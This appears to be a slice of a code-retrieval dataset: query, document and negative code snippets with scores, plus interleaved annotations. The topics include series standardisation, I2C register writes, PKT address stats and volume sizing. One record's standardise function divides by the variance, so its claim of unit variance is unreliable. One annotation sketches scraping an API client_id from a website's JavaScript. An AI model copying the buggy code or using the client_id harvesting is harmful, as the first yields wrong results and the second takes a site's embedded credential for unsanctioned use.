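An illustrative Python 3 sketch of the scraping pattern in the record above — fetch the main page, collect candidate app-bundle URLs, then regex a client_id out of each bundle. This is an annotation, not a dataset record; the URL and both regexes are assumptions carried over from the record, and the live page layout may differ.

import re
import requests

def find_client_id_sketch():
    # Fetch as text; the record's bytes-based matching is Python 2 era.
    page = requests.get("https://soundcloud.com", timeout=10).text
    # Candidate app bundle URLs (pattern assumed from the record).
    for url in re.findall(r'"(https?://[^"]+/app-[^"]+\.js)"', page):
        js = requests.get(url, timeout=10).text
        # Length-sanity-checked client_id, as in the record.
        m = re.search(r'client_id:"([^"]{16,128})"', js)
        if m:
            return m.group(1)
    return None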
return a new series whose mean is 0 and variance is 1
def SeriesStandard(series): mean = np.mean(series) variance = np.var(series) series = (series-mean)/variance return series
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def var(self) -> \"Stream[float]\":\n return self.agg(lambda x: np.var(x, ddof=1)).astype(\"float\")", "def variance(self):\n return 1 / self.count() * sum((number-self.average())**2 for number in self.numbers)", "def mean(vals):", "def zero_mean_unit_variance(Data):\n Mean = numpy.mean(Data, axis=0)\n Data -= Mean\n\n Std = numpy.std(Data, axis = 0)\n index = (numpy.abs(Std<10**-5))\n Std[index] = 1\n Data /= Std\n return [Data, Mean, Std]", "def sample_mean_var_ml(x):\n n = len(x)\n assert(n > 0)\n if n == 1:\n return x[0], 0\n s = 0.0\n ss = 0.0\n for i in x:\n s += i\n ss += i*i\n mu = s/n\n var = (ss/n) - mu*mu\n return mu, var", "def transform(a):\n return np.array([np.mean(a), np.std(a)])", "def _variance(self, features):\n return np.mean(np.var(features.reshape((features.shape[0], -1)), axis=1))", "def var(self):\n return self._reduce_for_stat_function(F.variance, only_numeric=True)", "def mean_and_variance(self, particles):\n mean = particles.mean(axis=0)\n mean[2] = np.arctan2(\n np.cos(particles[:, 2]).sum(),\n np.sin(particles[:, 2]).sum() \n )\n\n zero_mean = particles - mean\n for i in range(zero_mean.shape[0]):\n zero_mean[i, 2] = minimized_angle(zero_mean[i, 2])\n cov = np.dot(zero_mean.T, zero_mean) / self.num_particles\n\n return mean.reshape((-1, 1)), cov", "def variance(self):\r\n\t\t_mean = sum(self.sample)/len(self.sample)\r\n\t\treturn sum(map(lambda x: (x - _mean)**2, self.sample))/(len(self.sample) - 1)", "def normalize_series(series):\n return (series - series.mean()) / (series.max() - series.min())", "def mean(series):\n return fsum(series) / len(series)", "def variance_moving_average_time_series(series, length):\n \n # just in case the index isn't already datetime type\n series.index = pd.to_datetime(series.index)\n\n variance = series.rolling(length).var()\n\n variance.name = series.name+\"_var\"\n\n return variance", "def get_mle_variance(series, mean=None):\n\n if mean is None:\n\n mean = series.mean()\n\n return 1 / series.size * ((series - mean)**2).sum()", "def _derive_variance_(self):\n # Pure Photon Noise\n self._properties[\"var\"] = np.sqrt(self.rawdata*self.exposuretime) / self.exposuretime", "def variation_statistic(gene_data: pd.DataFrame) -> pd.Series:\n statistic = gene_data.std(axis=1) / gene_data.mean(axis=1)\n # statistic = gene_data.std(axis=1)\n # TODO How to deal with 0 expressed genes? 
Are they informative?????\n return statistic.replace(np.nan, 0)", "def std(self) -> \"Stream[float]\":\n return self.agg(lambda x: np.std(x, ddof=1)).astype(\"float\")", "def variance(y):\n \n # YOUR CODE HERE\n if len(y) == 0:\n return 0.\n \n return np.var(y)", "def mean(a_series):\n return float(sum(a_series) / max(len(a_series) * 1.0, 1.0))", "def unstandardize(da: xr.DataArray, mean: xr.DataArray, std: xr.DataArray):\n return (std * da) + mean", "def mean_variance_analysis(df):\n rets = np.log(df['close']/df['close'].shift(1))\n\n std = rets.std()* 252\n\n annualized_returns = rets.mean() * 252\n\n print(f'The annualized returns of the stock is {annualized_returns}, and the standard deviation of the stock is {std}')", "def mean_var_sd(x):\n n = x.size\n assert 2 <= n\n mean = x.sum() / n\n diff = x - mean\n var = np.vdot(diff, diff) / (n - 1)\n sd = var ** 0.5\n return {\n 'mean': mean,\n 'var': var,\n 'sd': sd,\n }", "def variance( values, sample=False ):\n mean_val = mean_value( values )\n n_val = len( values ) -1 if sample else len( values )\n return sum( [ j**2 for j in [ i - mean_val for i in values ] ] ) / n_val", "def stdAxisPoints(self, var):\n varID = var.id\n var = genutil.statistics.std(var, axis=\"(%s)\" % self.axis.id)\n var.id = varID\n return var", "def sample_mean_var_unbiased(x):\n n = len(x)\n assert(n > 0)\n if n == 1:\n return x[0], float('Inf')\n mean, v = sample_mean_var_ml(x)\n var = v*n/(n-1)\n return mean, var", "def get_mean_and_variance(self):\n self._set_statistics()\n return self.statistics_object.get_mean(), self.statistics_object.get_variance()", "def test_variance_of_slope_sums():\n\n ticker = 'GOOG'\n main_df = pd.read_pickle(settings.settings_dict['stock_data_path'])\n\n main_df = sample_slopes.create_slope_sum(main_df)\n\n slope_sums = main_df[ticker + \"slope_sum\"]\n\n print np.mean(main_df[ticker + \"slope_sum\"])\n print np.std(main_df[ticker + \"slope_sum\"])\n\n std = pd.rolling_std(slope_sums, window=20)\n\n _, ax2 = plt.subplots()\n\n ax2.plot(slope_sums)\n ax2.plot(slope_sums + std)\n ax2.plot(slope_sums - std)\n plt.legend(['Slope_Sum ', 'Slope_Sum +1 Std', 'Slope_Sum -1 Std'])\n plt.title(ticker + ' varrience of slope sum')\n plt.show()", "def explained_variance(returns, values):\n exp_var = 1 - torch.var(returns - values) / torch.var(returns)\n return exp_var.item()", "def test_mean_variance():\n f = np.asarray([\n [0.99, 1.0, 0.5],\n [0.69, 0.6, 0.6]])\n R = common_metrics.mean_variance(f, maximise=True)\n expected = np.asarray(\n [1.42320289996384, 1.54948632859709])\n assert np.allclose(R, expected)\n R = common_metrics.mean_variance(f, maximise=False)\n expected = np.asarray(\n [0.132210105461122, 0.351723890540445])\n assert np.allclose(R, expected)", "def test_variance(self):\n self.assertEqual(variance(list1, sample=False), np.var(list1))\n self.assertEqual(variance(list1), np.var(list1, ddof=1))" ]
[ "0.6331923", "0.60499734", "0.5981126", "0.59652394", "0.5938104", "0.5921124", "0.58709556", "0.58616686", "0.58051085", "0.57974374", "0.579102", "0.57625544", "0.5762502", "0.5761699", "0.57592386", "0.57551837", "0.5746474", "0.57087433", "0.5698675", "0.56976444", "0.5693832", "0.5690835", "0.5678038", "0.56728256", "0.56473416", "0.5631198", "0.56239617", "0.5619374", "0.56188816", "0.56057966" ]
0.64050394
0
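A note on the record above (annotation, not a dataset record): dividing by the variance gives var((x - mean) / var) = 1/var, so the output only has unit variance when the variance was already 1. The conventional z-score divides by the standard deviation — a minimal sketch:

import numpy as np

def standardize(series):
    # Return a copy of `series` with mean 0 and variance 1 (z-score).
    series = np.asarray(series, dtype=float)
    std = np.std(series)
    if std == 0:
        raise ValueError("cannot standardize a constant series")
    return (series - np.mean(series)) / std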
Switched with mv_all; was inverted with mv_step.
def mv_step(self): # def mv_all(self): self.device_reg_data &= ~(0x1 << 3) bus.write_byte_data(self.device_address, self.device_reg_mode1, self.device_reg_data)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mv_all(self):\n # def mv_step(self):\n self.device_reg_data &= ~(0x1 << 2)\n bus.write_byte_data(self.device_address, self.device_reg_mode1, self.device_reg_data)", "def step(self, move):", "def step(self, state):", "def step_forward(self):", "def step(self):\n while self.state != STATE_TERMINAL:\n self.step_strategies[self.state]()", "def moveSpecialOb(self):\n\t\tfor obJ in self.special:\n\t\t\tobJ.moveStep()", "def step(self, model):\n\n if self.active == 0:\n\n self.activate(model)\n\n elif self.active == 1:\n\n self.move(model)\n\n self.exit_query(model)\n\n self.save(model)\n\n return", "def do_step(self) -> None:", "def step(self):\n self.log.info(\"Stepping %r\", self)\n # get enabled transitions before reseting inputs\n scope_transitions = self.get_enabled_transitions_by_scope()\n\n # reset inputs/outputs at the start of a big step\n if self.enabled_inputs:\n self.log.info(\"Reseting inputs and outputs at start of big step...\")\n self.enabled_inputs = set()\n self.outputs = set()\n self.locals = set()\n\n # execute transitions\n # - note that each scope is non-overlapping by definition\n updates = dict()\n for scope, transitions in scope_transitions.items():\n if len(transitions) > 1: # non-determinism\n pass\n transition = transitions[0]\n self._execute_transition(transition, updates)\n\n # update variables\n self.variables.update(updates)\n self.log.info(\"Variables now %r\", self.variables)", "def switch_pivot():\n for piv_switcher in get_one_switcher():\n piv_switcher.switch()", "def reset_all(self):\n self._stepsize = _stepsize\n self.reset_f()\n self.reset_s()\n self.reset_u()", "def _step(self) -> None:", "def startMovementAll(self):\n self.startMovementX()\n self.startMovementY()\n self.startMovementZ()", "def _step(self):\n pass", "def decide_next_move(self):\n pass", "def step(self, action):\n x, y = self.state_to_coord(self.current_state)\n if action == self.actions['up']:\n possible_next_state = self.coord_to_state(x - 1, y)\n if x - 1 < 0 or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n elif possible_next_state in self.goal_states:\n result = possible_next_state, self.goal_reward, True\n else:\n result = possible_next_state, self.step_reward, False\n elif action == self.actions['right']:\n possible_next_state = self.coord_to_state(x, y + 1)\n if y + 1 >= self.columns or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n else:\n result = possible_next_state, self.step_reward, False\n\n elif action == self.actions['left']:\n possible_next_state = self.coord_to_state(x, y - 1)\n if y - 1 < 0 or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n else:\n result = possible_next_state, self.step_reward, False\n\n elif action == self.actions['down']:\n possible_next_state = self.coord_to_state(x + 1, y)\n if x + 1 >= self.rows or possible_next_state in self.block_states:\n result = self.current_state, self.step_reward, False\n else:\n result = possible_next_state, self.step_reward, False\n\n else:\n raise ValueError('Expected action value in {}, received {} in state {}'.\n format(self.actions, action, self.state_to_coord(self.current_state)))\n\n self.current_state = result[0]\n return result", "def _add_switchs(self):\r\n lst = self.model.get_all_switch()\r\n\r\n for itm in lst:\r\n self._add_switch(itm)", "def step(self, action):\n\n # ==\n # Transition, reward and termination\n done = False\n reward = 
self.get_current_reward(self.state)\n\n # Leaf and absorbing nodes\n if self.state <= 1:\n done = True\n if self.state == 1:\n self.state = 0 # go to absorbing\n else:\n self.state = int(self.state // 2)\n\n # ==\n # Features\n phi = self.state_2_features(self.state)\n\n return phi, reward, done, {}", "def step(self, action):", "def stopMovementAll(self):\n self.stopMovementX()\n self.stopMovementY()\n self.stopMovementZ()", "def step_to(self, inp, out):\n for new_state in self.current_state.transitions[inp]:\n if new_state[0] == out:\n self.current_state = new_state[1]\n return out\n return None", "def step(self,inp): ## function responsible for exciting the machine with a SINGLE INPUT VALUE\n (s, o) = self.getNextValues(self.state,inp)\n # will store the state and return the output\n self.state =s\n return o", "def step(self, action: CARLAAction, *args: Any, **kwargs: Any) -> Transition:\n observation, reward, done, info = self.env.step(action)\n if observation[\"lane_invasion\"] > 0:\n logging.debug(\"A lane was invaded\")\n done = True\n reward = -1.0\n return observation, reward, done, info", "def next_step(self):\n _modeller.mod_state_optimizer_next_step(self._modpt)", "def vizualize(self, moves):\n for move in moves:\n if move == 'L':\n self.go_left()\n elif move == 'R':\n self.go_right()\n elif move == 'D':\n self.go_down()\n elif move == 'U':\n self.go_up()", "def move(self): # AH note. Swich move with extra_steps?\n if self.adjustment < 0:\n self.position += self.extra_steps\n super().move()\n self.no_moves += 1\n # Do the regular move", "def step(self):\n if not self.is_done():\n actions = [ agent.program(self.percept(agent)) for agent in self.agents ]\n for agent, action in zip(self.agents, actions):\n self.execute_action(agent, action)\n\n self.exogenous_change()", "def advance_state_machine():\n global state_num\n\n if state_num == 0:\n brighter_switch(jess, \"orange\")\n dimmer_switch(ness, \"red\")\n dimmer_switch(tess, \"green\")\n state_num = 1\n\n elif state_num == 1:\n brighter_switch(ness, \"red\")\n dimmer_switch(jess, \"orange\")\n dimmer_switch(tess, \"green\")\n\n state_num = 2\n\n else:\n brighter_switch(tess, \"green\")\n dimmer_switch(ness, \"red\")\n dimmer_switch(jess, \"orange\")\n\n state_num = 0", "def step(self, move):\r\n self.board.push_uci(move)\r\n self.num_halfmoves += 1", "def replay_steps(s):\n if s is None:\n print \"nothing to do\"\n return\n for (addr,action,arg) in s:\n action(arg)" ]
[ "0.61674994", "0.597512", "0.5870767", "0.58470446", "0.576566", "0.5624128", "0.560035", "0.5490663", "0.5485842", "0.54782003", "0.5429284", "0.53762597", "0.5370525", "0.53394765", "0.5291796", "0.52729493", "0.52668846", "0.5265301", "0.5239564", "0.5236908", "0.5234921", "0.5210103", "0.5208682", "0.5194724", "0.5193267", "0.5183489", "0.5175141", "0.51678973", "0.5164121", "0.5162699" ]
0.6441095
0
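The record above (and its mv_all counterpart in the negatives) clears one bit of a cached register copy and writes it back over I2C — bit 3 for mv_step, bit 2 for mv_all. A generic sketch of that pattern (annotation, not a dataset record; `bus` is assumed to be an open smbus2.SMBus, or anything exposing write_byte_data):

def clear_register_bit(bus, device_address, register, bit, cached_value):
    # Clear `bit` in the cached register value, push it to the device,
    # and return the new value so the caller can update its cache.
    new_value = cached_value & ~(1 << bit)
    bus.write_byte_data(device_address, register, new_value)
    return new_value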
return the specified PKT statistic (int) for the given address (str) and stat name (str)
def get_stat(address, stat): base_url = 'https://pkt.cash/api/v1/PKT/pkt/address/' request_url = base_url + address addrStats = url_to_dict(request_url) return int(addrStats[stat])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_stat(self, name: str) -> int:\n return self._mallctl(f\"stats.{name}\")", "def get_player_stats_name(self, player_name):\n status, data = self._get_player_game_stats(player_id=self._player_dict[player_name]['PlayerID'])\n return status, data.decode(\"utf-8\")", "def getShort(self, addr: ghidra.program.model.address.Address) -> int:\n ...", "def _name2idx(name):\n match = re.search(r\"eth(\\d+)\", name, re.I)\n if not match:\n raise exception.CloudbaseInitException(\n \"invalid NetworkDetails name {!r}\"\n .format(name)\n )\n return int(match.group(1))", "def portstatsshow(obj, content):\n global _portstats_to_api\n\n port_obj, port_stats_d, switch_obj = None, None, obj.r_switch_obj()\n\n for buf in content:\n buf = buf.replace('er_single_credit_loss', 'er_single_credit_loss ')\n buf = buf.replace('er_multi_credit_loss', 'er_multi_credit_loss ')\n buf = buf.replace('fec_corrected_rate', 'fec_corrected_rate ')\n buf = buf.replace('latency_dma_ts', 'latency_dma_ts ')\n tl = gen_util.remove_duplicate_char(buf.replace('\\t',' '), ' ').split(' ')\n if len(tl) < 2:\n continue\n\n if tl[0] == 'port:':\n port_obj = brcddb_port.port_obj_for_index(switch_obj, int(tl[1].strip()))\n if port_obj is None:\n brcdapi_log.exception('Could not find port matching: ' + buf, echo=False) # Just so it gets in the log\n raise Exception('Could not find port matching: ' + buf)\n port_stats_d = port_obj.r_get(brcdapi_util.stats_uri)\n if port_stats_d is None:\n port_stats_d = dict(name=port_obj.r_obj_key())\n port_obj.s_new_key(brcdapi_util.stats_uri, port_stats_d)\n\n elif tl[0] in _portstatsshow_special:\n _portstatsshow_special[tl[0]](port_obj)\n\n else:\n key = _portstats_to_api.get(tl[0])\n if key is not None:\n port_stats_d.update({key: int(tl[1])})", "def getShort(self, address: ghidra.program.model.address.Address) -> int:\n ...", "def read_lnet_stats(f):\n ret = {'send_count': 0, 'recv_count': 0, 'send_length':0, 'recv_length': 0}\n\n pfile = os.path.normpath(f) + \"/stats\"\n with open(pfile, \"r\") as f:\n for line in f:\n chopped = line.split()\n if chopped[3]:\n ret[\"send_count\"] = int(chopped[3])\n if chopped[4]:\n ret[\"recv_count\"] = int(chopped[4])\n if chopped[7]:\n ret[\"send_length\"] = int(chopped[7])\n\t\tif chopped[8]:\n\t\t ret[\"recv_length\"] = int(chopped[8])\t\n \n\n if ret['send_count'] == 0 and ret['recv_count'] == 0 and ret['send_length'] == 0 and ret['recv_length'] == 0 :\n return None\n\n return ret", "def _read_stats(self, name):\n if os.name == 'nt':\n name = asunicode(name)\n stats = os.stat(name)\n mode = oct(stats.st_mode)[-4:]\n size = stats.st_size\n atime = int(stats.st_atime)\n mtime = int(stats.st_mtime)\n return (mode, size, mtime, atime)", "def get_stats(stat_name: str, stat_year: str=\"1978\") -> str:\n fixed_name = stat_name.lower()\n\n if stat_year != '1978':\n output = _get_content(fixed_name, \"stats\", stat_year)\n else:\n output = _get_content(fixed_name, \"stats\")\n\n return output", "def parse_character_stat(raw_stat: str) -> int:\n pattern = r\"(\\d+)\"\n stat = re.search(pattern, raw_stat).group()\n\n return int(stat)", "def samtools_stats(filename):\n stats, err = Popen([\"samtools\",\"stats\",filename], stdout=PIPE, stderr=PIPE).communicate()\n if err != \"\":\n raise Exception(err)\n stats = [x.split(\"\\t\") for x in stats.split(\"\\n\")]\n chksum = [x for x in stats if x[0].startswith(\"CHK\")][0]\n stats = dict([(x[1].replace(\":\",\"\"),set_type(x[2]),) for x in stats if x[0].startswith(\"SN\")])\n stats[\"filename\"] = filename\n 
stats[\"chksum_read_names\"] = chksum[1]\n stats[\"chksum_sequences\"] = chksum[2]\n stats[\"chksum_qualities\"] = chksum[3]\n return stats", "def _getStatisticType(self, statistic):\n\n instructions = simplejson.loads(statistic.instructions_json)\n return instructions['type']", "def map_stat_name(self, generic_name):\n pass", "def get_kstat(descriptor, only_num=True, no_times=False, terse=False,\n ks_class=None, statlist=None, single_val=False):\n assert isinstance(descriptor, basestring)\n assert isinstance(only_num, bool)\n assert isinstance(no_times, bool)\n assert isinstance(terse, bool)\n\n if isinstance(statlist, basestring):\n statlist = [statlist]\n\n d = kstat_req_parse(descriptor)\n ret = {}\n\n if d['module']:\n ko = kstat.Kstat(d['module'])\n else:\n ko = kstat.Kstat()\n\n for mod, inst, name, kclass, ks_type, ksp in ko._iterksp():\n if d['instance'] is not None and inst != d['instance']:\n continue\n\n if d['name'] is not None and name != d['name']:\n continue\n\n if ks_class is not None and kclass != ks_class:\n continue\n\n astat = ko[mod, inst, name]\n\n for k, v in astat.items():\n if d['statistic'] is not None and k != d['statistic']:\n continue\n\n if statlist is not None and statlist != ['__all__'] and \\\n k not in statlist:\n continue\n if k == 'snaptime' or k == 'crtime':\n if no_times:\n continue\n v = long(v)\n if only_num:\n try:\n float(v)\n except:\n continue\n\n if single_val:\n return v\n\n k = k.lower().replace(' ', '_')\n\n if not terse:\n k = '%s:%d:%s:%s' % (mod, inst, name, k)\n ret[k] = v\n\n return ret", "def getProfile(self, name):\n SN = None\n for x in self.root.goto(\"CommonDataObjects/MeasurementOptions/*/massintervals\"):\n if x.name == 'mi':\n v = x.dictList()\n lab = v['assign']['utf16'] or v['desc']['utf16']\n if lab == name:\n SN = v['SN']['utf16']\n break\n if SN is None:\n raise Exception(\"Profile \\\"{}\\\" not found\".format(name))\n path = \"CommonDataObjects/DataViewCollection/*/dataSource/simsDataCache/{SN}/profile\".format(SN=SN)\n raw = self.root.goto(path, lazy=True).decompress()\n return struct.unpack(\"<\" + str(len(raw) // 8) + \"d\", raw)", "def net_if_stats():\n ret = {}\n rawdict = cext.net_if_stats()\n for name, items in rawdict.items():\n if not PY3:\n assert isinstance(name, unicode), type(name)\n name = py2_strencode(name)\n isup, duplex, speed, mtu = items\n if hasattr(_common, 'NicDuplex'):\n duplex = _common.NicDuplex(duplex)\n ret[name] = _common.snicstats(isup, duplex, speed, mtu, '')\n return ret", "def get_value(name):\n\n metrics = get_metrics()[0]\n\n name = name[len(NAME_PREFIX):] # remove prefix from name\n try:\n result = metrics['data'][name]\n except StandardError:\n result = 0\n\n return result", "def extract_stats(stat_list, prefix=\"\"):\n for stat in stat_list:\n data = stat.strip().split('\\n')\n value = data[0]\n\n # attempt to convert to number, and deal\n # with using 'k' as an abbreviation to 1000.\n try:\n if value[-1] == 'k':\n value = float(value[:-1])*1000\n else:\n value = float(value)\n except ValueError:\n pass\n\n name = prefix + data[1].replace(' ', '_')\n profile[name] = value", "def getSymbolAt(self, address: ghidra.program.model.address.Address, name: unicode) -> ghidra.program.model.symbol.Symbol:\n ...", "def rpc_getaddressinfo(self, address: str) -> dict:\n return self._call_command([\"getaddressinfo\", address])", "def get_stats(name):\n\n return get_component(CachingPackage.COMPONENT_NAME).get_stats(name)", "def _parse_addr(self, addr: str):\n addr = addr.upper()\n return 
self._registers_list.get(addr, None)", "def _request_stats(self, datapath):\n self.logger.debug('send stats request: %016x', datapath.id)\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n req = parser.OFPPortDescStatsRequest(datapath, 0)\n datapath.send_msg(req)\n\n req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)\n datapath.send_msg(req)\n\n req = parser.OFPFlowStatsRequest(datapath)\n datapath.send_msg(req)", "def packetSniff():\n\n packets = psutil.net_io_counters(pernic=True)\n interfaces = {}\n x = 0\n for p in packets.items():\n values = {}\n values['name'] = p[0]\n values['bytes_sent'] = p[1][0]\n values['bytes_recv'] = p[1][1]\n values['pckt_sent'] = p[1][2]\n values['pckt_recv'] = p[1][3]\n values['errin'] = p[1][4]\n values['errout'] = p[1][5]\n values['dropin'] = p[1][6]\n values['dropout'] = p[1][7]\n\n if ((values['bytes_sent'] or values['bytes_recv'] or\n values['pckt_sent'] or values['pckt_recv']) != 0):\n\n interfaces[x] = values\n x += 1\n else:\n pass\n\n return interfaces", "def lookup_socket(self, address): # TODO: optimize me\n\n net_tuple = self.read_nodestate(0)\n for item in net_tuple:\n discovered_address = item[1]\n if address == discovered_address:\n return item[0]", "def current_stat(self, stat: Stat) -> int:\n return self.stats[stat]", "def get_mgmt_addr(ssx_name=\"none\"): \n\n\n cmd=\"nslookup %s >> mgmt.txt\" %(ssx_name)\n os.system(cmd)\n fileptr=file(\"mgmt.txt\",\"r\")\n outputstr=fileptr.read()\n regex=re.compile('\\nAddress:(\\s+)(\\d+).(\\d+).(\\d+).(\\d+)\\n')\n regex1=re.compile('(\\d+)..(\\d+).(\\d+).(\\d+)')\n found=regex.search(outputstr)\n found1=regex1.search(found.group())\n return found1.group()", "def get_stat(self, stat_type):\n result_stat = 0\n stat_list = self.log_book[stat_type]\n if len(stat_list) != 0:\n result_stat = np.mean(stat_list)\n result_stat = np.round(result_stat, 4)\n return result_stat", "def _get_openvpn_stats(path=\"/var/run/openvpn/server-0.sock\"):\n try:\n logging.debug(\"Getting metrics from %s\", path)\n with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock:\n sock.connect(path)\n sock.send(b\"load-stats\\n\")\n sock.setblocking(0)\n\n ready = select.select([sock], [], [], 5.0)\n if ready[0]:\n data = sock.recv(4096)\n if not data:\n logging.debug(\"No result?\")\n return 0\n data = data.decode('utf-8')\n logging.debug(\"Received %s\", data)\n data_match = re.search(r'nclients=(\\d+)', data)\n logging.debug(\"pattern match result %s\", data_match)\n if data_match:\n logging.debug(\"%s connections\", data_match.group(1))\n return int(data_match.group(1))\n except Exception as exc:\n logging.debug(\"Error gathering openvpn stats: %s\", exc)\n\n return 0", "def status(cls, stat, request=Retrieve):\n res = cls.STATUS_MAP.get(stat)\n if res is None:\n res = status.Status('%d.00' % (stat // 100))\n if res.success:\n res = request.success\n return res" ]
[ "0.66505015", "0.5510597", "0.5497371", "0.5400981", "0.5397578", "0.538371", "0.52910346", "0.52851224", "0.5273926", "0.5184255", "0.51780534", "0.51542836", "0.51154304", "0.51121444", "0.51022923", "0.50941217", "0.50751036", "0.5028282", "0.5005922", "0.49972942", "0.49870563", "0.49711207", "0.49637112", "0.4929783", "0.4927736", "0.4917471", "0.49109522", "0.49053782", "0.49053696", "0.49013513" ]
0.83788157
0
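A sketch of the record above (annotation, not a dataset record): fetch the address's JSON document and read one numeric field. The endpoint is copied verbatim from the record; using requests with a timeout stands in for the record's url_to_dict helper, which is not shown.

import requests

def get_stat_sketch(address, stat):
    # One GET per lookup; raises KeyError if `stat` is not in the response.
    url = "https://pkt.cash/api/v1/PKT/pkt/address/" + address
    payload = requests.get(url, timeout=10).json()
    return int(payload[stat])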
Convenience method that rounds input to a valid ScaleIO Volume size (8 GB increments)
def is_valid_volsize(self,volsize): if type(volsize) is int: size_temp = divmod(volsize, 8192) if size_temp[1] > 0: # If not on 8GB boundary return int((1 + size_temp[0]) * 8192) # Always round to next 8GB increment else: return int(volsize)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ensure_size(value):\n return int(round(value * 1.0 / base)) * base", "def round_volume(volume, ndigits):\n return ul(round(volume.to('microliter').magnitude,ndigits))", "def convertFromBytes(size, unit):\n\tif (unit == 'kb'):\n\t\treturn size / 10000\n\telif (unit == 'mb'):\n\t\treturn size / 1000000\n\telif (size == 'gb'):\n\t\treturn size / 1000000000", "def ceil_volume(volume,ndigits=0):\n \n magnitude = volume.to('microliter').magnitude\n power_multiple = math.pow(10,ndigits)\n return ul(math.ceil(magnitude * int(power_multiple)) / power_multiple)", "def volume_size(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"volume_size\")", "def volume_size(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"volume_size\")", "def volume_size(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"volume_size\")", "def size_in_mb(size_in_bytes):\n if size_in_bytes < 10**6:\n return size_in_bytes // 1000\n else:\n return size_in_bytes // 10**6", "def __convert_file_size(self, file_size:float)->float:\n return file_size * 1000000", "def convert_unit(size_in_bytes, unit):\n if unit == 'KB':\n return size_in_bytes/1024\n elif unit == 'MB':\n return size_in_bytes/(1024*1024)\n elif unit == 'GB':\n return size_in_bytes/(1024*1024*1024)\n else:\n return size_in_bytes", "def fix_size(value):\n try:\n obj_size = int(float(value) * wx.GetApp().settings.size_coeff)\n except AttributeError:\n obj_size = int(value)\n return obj_size", "def storage_size_to_kb(self,storage_size):\n multiplier = 1\n val = float(storage_size[0:-2])\n meter = storage_size[-2:]\n if \"kb\" == meter:\n multiplier = 1\n elif \"mb\" == meter:\n multiplier = 1024\n elif \"gb\" == meter:\n multiplier = 1024*1024\n return val*multiplier", "def filter_storage_size_num(size_str):\n\n # pattern: '^[1-9][\\d\\.]*[MGT]B?$', multiplier=1000 (not KiB)\n if size_str.endswith('B'):\n size_str = size_str[:-1]\n try:\n size_num = 1000000\n for multiplier in ['M', 'G', 'T']:\n if size_str.endswith(multiplier):\n return '{:.2f}'.format(size_num * float(size_str[:-1]))\n size_num = size_num * 1000\n return '{:.2f}'.format(float(size_str))\n except ValueError as ex:\n logging.error(size_str + \" is not a valid size string\")\n raise", "def _parseDiskSize(self, diskSizeParam): \\\n # pylint: disable=no-self-use\n if diskSizeParam.endswith('TB'):\n return int(float(diskSizeParam[:-2]) * 1000000)\n\n if diskSizeParam.endswith('GB'):\n return int(float(diskSizeParam[:-2]) * 1000)\n elif diskSizeParam.endswith('MB'):\n # Must be an integer\n return int(diskSizeParam[:-2])\n\n return int(diskSizeParam)", "def volume_size(self) -> Optional[int]:\n return pulumi.get(self, \"volume_size\")", "def volume_size(self) -> Optional[int]:\n return pulumi.get(self, \"volume_size\")", "def _disk_size_in_gb(_string):\n try:\n value = int(_string)\n except ValueError as e:\n raise argparse.ArgumentTypeError(str(e))\n if value <= 0:\n raise argparse.ArgumentTypeError('Size must be positive value')\n return value", "def floor_volume(volume):\n return ul(math.floor(volume.to('microliter').magnitude))", "def size_to_gb(self, value):\n nb = re.search(\"[0-9]+\", value)\n if nb:\n nb = int(re.search(\"[0-9]+\", value).group())\n else:\n return 0\n if \"MB\" in value:\n return nb / 1024 if nb else 0\n elif \"GB\" in value:\n return nb\n else:\n return 0", "def baseSize_convert(baseSize_string): \r\n # Convert input genome size to int\r\n if baseSize_string[-1].upper() == 'K':\r\n baseSize = float(baseSize_string[0:-1]) * 1000\r\n 
elif baseSize_string[-1].upper() == 'M':\r\n baseSize = float(baseSize_string[0:-1]) * 1000000\r\n elif baseSize_string[-1].upper() == 'G':\r\n baseSize = float(baseSize_string[0:-1]) * 1000000000\r\n else:\r\n baseSize = float(baseSize)\r\n \r\n return int(baseSize)", "def _fromBytes(self, size, unity):\n size_map = {'B': 1, 'KB': 1024, 'MB': 1024 ** 2, 'GB': 1024 ** 3,\n 'TB': 1024 ** 4}\n return size / size_map[unity]", "def size(self, new_size):\n if type(new_size) is str:\n new_size = new_size.replace(\" \", \"\").upper()\n new_size = new_size.replace(\")\", \"\")\n new_size = new_size.replace(\"(\", \"\")\n new_size = new_size.replace(\",\", \".\")\n new_size = new_size.replace(\"B\", \"\").strip()\n target_unit = None\n multiplier = 1\n is_bytes = False\n try:\n float(new_size)\n target_unit = \"B\"\n is_bytes = True\n except Exception as e:\n pass\n\n if not is_bytes:\n multiplier *= 1024\n for unit in [\"K\", \"M\", \"G\", \"T\", \"P\", \"E\", \"Z\", \"Y\"]:\n if not target_unit and unit in new_size:\n target_unit = unit\n multiplier *= 1024\n # Reject double units\n elif target_unit and unit in new_size:\n target_unit = None\n break\n\n if target_unit:\n new_size = new_size.replace(target_unit, \"\").strip()\n try:\n self._size = int(float(new_size) * multiplier)\n except Exception as e:\n logger.error(f\"Failed to set a size from \\\"{new_size}\\\"\")\n logger.error(e)\n\n elif type(new_size) is int:\n self._size = new_size\n\n else:\n raise Exception(\"Wrong size type provided ({type(new_size)})\")\n\n if not self._size:\n logger.warn(f\"Failed to set a size from \\\"{new_size}\\\"\")", "def bytes_to_size(size):\n if not size >> 10 or size < 0:\n return str(size)\n elif not size >> 20:\n return '{:.2f}KB'.format(size / 1024.0)\n elif not size >> 30:\n return '{:.2f}MB'.format(size / (1024.0 ** 2))\n elif not size >> 40:\n return '{:.2f}GB'.format(size / (1024.0 ** 3))\n else:\n return '{:.2f}TB'.format(size / (1024.0 ** 4))", "def parse_size(size,b=1024,u='B',pre=['']+[p for p in'KMGTPEZY']):\n intsize, unit = extract_num_unit(size)\n\n # Account for 10B vs 10KB when looking for 